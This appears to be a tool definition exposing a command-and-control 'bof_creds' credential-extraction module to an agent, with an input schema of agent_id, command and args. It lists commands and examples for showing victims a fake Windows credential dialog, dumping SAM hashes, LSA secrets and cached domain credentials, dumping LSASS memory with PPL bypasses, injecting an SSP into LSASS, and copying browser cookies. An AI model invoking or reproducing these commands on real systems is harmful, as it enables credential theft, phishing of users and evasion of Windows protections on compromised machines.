bof_creds
Extract Windows credentials including SAM hashes, LSA secrets, cached domain credentials, and browser cookies using various BOF techniques.
Instructions
Creds-BOF: Windows credential extraction.
askcreds [-p prompt] [-n note] [-t wait_time_secs] [--async] Prompt user for credentials via fake dialog. Example: askcreds -p "Windows Update"
get-netntlm [--no-ess] Retrieve NetNTLM hash (Internal Monologue). Example: get-netntlm --no-ess
hashdump Dump SAM hashes (requires admin). Auto-saves to credentials tab.
lsadump_secrets Dump LSA secrets from SECURITY hive (requires SYSTEM). Auto-saves service credentials.
lsadump_sam Dump SAM hashes via lsadump::sam (requires admin).
lsadump_cache Dump cached domain credentials DCC2/MSCacheV2 (requires SYSTEM).
nanodump [--write path] [--valid] [--ppl-dump] [--kdump] ... Dump LSASS via syscalls. Example: nanodump --write C:\Windows\Temp\lsass.dmp
nanodump_ppl_dump Bypass PPL and dump LSASS (PPL-dump variant).
nanodump_ppl_medic Bypass PPL and dump LSASS (PPL-medic variant).
nanodump_ssp Load a Security Support Provider (SSP) into LSASS.
cookie-monster [--edge] [--chrome] [--firefox] [-t target_user] Locate and copy browser cookie files.
underlaycopy <MFT|Metadata> [-w destination] [--download] Copy file using low-level NTFS (MFT/Metadata mode). Example: underlaycopy MFT C:\Windows\System32\notepad.exe -w C:\temp\copy.exe
Input Schema
| Name | Required | Description | Default |
|---|---|---|---|
| agent_id | Yes | ||
| command | Yes | ||
| args | No |
Output Schema
| Name | Required | Description | Default |
|---|---|---|---|
| result | Yes |